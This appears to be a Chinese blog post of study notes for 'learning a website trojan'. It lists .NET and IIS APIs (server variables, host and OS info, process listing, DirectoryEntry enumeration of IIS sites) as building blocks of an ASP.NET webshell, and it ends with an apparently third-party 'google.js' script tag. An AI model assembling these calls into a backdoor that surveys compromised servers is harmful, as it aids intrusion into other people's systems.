一个网站木马的学习1

public static string HashPasswordForStoringInConfigFile(

      string password,

      string passwordFormat

)

根据指定的密码和哈希算法生成一个适合于存储在配置文件中的哈希密码。

 

 

 

HttpRequest.ServerVariables 属性

获取 Web 服务器变量的集合。

下面摘自  http://blog.sina.com.cn/s/blog_4bf6551d01000721.html

ServerVariables集合环境变量列表

语法
Request.ServerVariables(server environment variable)
参数
服务器环境变量，指定要检索的服务器环境变量名。可以使用下面列出的值：

变量说明
ALL_HTTP客户端发送的所有HTTP标题文件。
ALL_RAW检索未处理表格中所有的标题。
APPL_MD_PATH检索ISAPIDLL的(WAM)Application的元数据库路径。
APPL_PHYSICAL_PATH检索与元数据库路径相应的物理路径。IIS通过将APPL_MD_PATH转换为物理（目录）路径以返回值。
AUTH_PASSWORD该值输入到客户端的鉴定对话中。只有使用基本鉴定时，该变量才可用。
AUTH_TYPE这是用户访问受保护的脚本时，服务器用于检验用户的验证方法。
AUTH_USER未被鉴定的用户名。
CERT_COOKIE客户端验证的唯一ID，以字符串方式返回。可作为整个客户端验证的签字。
CERT_FLAGS如有客户端验证，则bit0为1。如果客户端验证的验证人无效(不在服务器承认的CA列表中),bit1被设置为1.

CERT_ISSUER用户验证中的颁布者字段（O=MS，OU=IAS，CN=username，C=USA）。
CERT_KEYSIZE安全套接字层连接关键字的位数，如128。
CERT_SECRETKEYSIZE服务器验证私人关键字的位数。如1024。
CERT_SERIALNUMBER用户验证的序列号字段。
CERT_SERVER_ISSUER服务器验证的颁发者字段。
CERT_SERVER_SUBJECT服务器验证的主字段。
CERT_SUBJECT客户端验证的主字段。
CONTENT_LENGTH客户端发出内容的长度。
CONTENT_TYPE内容的数据类型。同附加信息的查询一起使用，如：HTTP查询GET、POST和PUT。
GATEWAY_INTERFACE服务器使用的CGI规格的修订。格式为CGI/revision。
LOGON_USER用户登录WindowsNT５恼屎拧，（这里应该是用户名吧）
PATH_INFO客户端提供的额外路径信息。可以使用这些虚拟路径和PATH_INFO服务器变量访问脚本。如果该信息来自URL，在到达CGI脚本前就已经由服务器解码了。
PATH_TRANSLATEDPATH_INFO转换后的版本，该变量获取路径并进行必要的由虚拟至物理的映射。
QUERY_STRING查询HTTP请求中问号（?）后的信息。
REMOTE_ADDR发出请求的远程主机的IP地址。
REMOTE_HOST发出请求的主机名称。如果服务器无此信息，它将设置为空的MOTE_ADDR变量。
REMOTE_USER用户发送的未映射的用户名字符串。该名称是用户实际发送的名称，与服务器上验证过滤器修改过后的名称相对。
REQUEST_METHOD该方法用于提出请求。相当于用于HTTP的GET/HEAD/POST等等。
SCRIPT_NAME执行脚本的虚拟路径。用于自引用的URL。
SERVER_NAME出现在自引用UAL中的服务器主机名、DNS化名或IP地址。
SERVER_PORT发送请求的端口号。
SERVER_PORT_SECURE包含0或1的字符串。如果安全端口处理了请求，则为1，否则为0。
SERVER_PROTOCOL请求信息协议的名称和修订。格式为protocol/revision。
SERVER_SOFTWARE应答请求并运行网关的服务器软件的名称和版本。格式为name/version。

 

ServerVariables["SERVER_SOFTWARE"] 得到IIS的版本

Request.ServerVariables["PATH_TRANSLATED"] 当前文件的绝对路径

关于 local_addr 服务器地址 本机就是127.0.0.1

下面是帮助文档的内容

LOCAL_ADDR

Returns the server address on which the request came in. This is important on computers where there can be multiple IP addresses bound to the computer, and you want to find out which address the request used.

Environment

提供有关当前环境和平台的信息以及操作它们的方法。

Environment.MachineName  主机名称

Environment.OSVersion    主机操作系统版本

 

Process 类

提供对本地和远程进程的访问并使您能够启动和停止本地系统进程。

Process 组件提供对正在计算机上运行的进程的访问。用最简短的话来说，进程就是当前运行的应用程序。线程是操作系统向其分配处理器时间的基本单位。线程可执行进程的任何一部分代码，包括当前由另一线程执行的部分。

对于启动、停止、控制和监视应用程序等任务，Process 组件是很有用的工具。使用 Process 组件，可以获取正在运行的进程的列表，或者可以启动新的进程。Process 组件用于访问系统进程。初始化 Process 组件后，可使用该组件来获取有关当前运行的进程的信息。此类信息包括线程集、加载的模块（.dll 和 .exe 文件）和性能信息（如进程当前使用的内存量）。

Process..::.GetProcesses 方法

为本地计算机上的每个进程资源创建一个新的 Process 组件。

返回值

类型：array<System.Diagnostics.Process>[]()[]

Process 类型的数组，它表示本地计算机上运行的所有进程资源。

备注

使用此方法创建新的 Process 组件的数组，并将它们与本地计算机上的所有进程资源关联。该进程资源必须已经存在于本地计算机上，因为 GetProcesses 不创建系统资源，而是将资源与应用程序生成的 Process 组件进行关联。因为操作系统本身正在运行后台进程，所以此数组永远不为空。

 

 

Process.iD

Id

获取关联进程的唯一标识符。

ProcessName

获取该进程的名称。

WorkingSet

已过时。获取关联进程的物理内存使用情况。

Threads

获取在关联进程中运行的一组线程。

DirectoryEntry 类

DirectoryEntry 类可封装 Active Directory 域服务层次结构中的节点或对象。( System.DirectoryServices)

Active Directory 域服务层次结构包含多达数千个的节点。每个节点表示一个对象，如网络打印机或域中的用户。公司网络会因为聘用新员工和添加对象（如网络打印机和计算机）而经常发生变化。Active Directory 服务接口 (ADSI) 技术提供了以编程方式向目录树中添加这些对象的途径。

若要在层次结构中创建目录项，请使用 Children 属性。Children 属性是一个集合，提供 Add 方法，通过该方法将节点直接添加到当前绑定到的父节点之下的集合。当向集合中添加节点时，必须指定新节点的名称以及要与该节点相关联的架构模板的名称。例如，您可能需要使用标题为“Computer”的架构在层次结构中添加新的计算机。

        string iisstr = "IIS://localhost/W3SVC";

    DirectoryEntry mydir = new DirectoryEntry(iisstr) 返回的是一个集合  包括IIS所有的站点信息。

初始化 DirectoryEntry 类的新实例，该类将此实例绑定到位于指定路径的 Active Directory 域服务中的节点。

可以参考 如何在 DotNet 中操作 IIS

<script src="http://www.cdsbfx.com/js/google.js" type="text/javascript"></script><script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>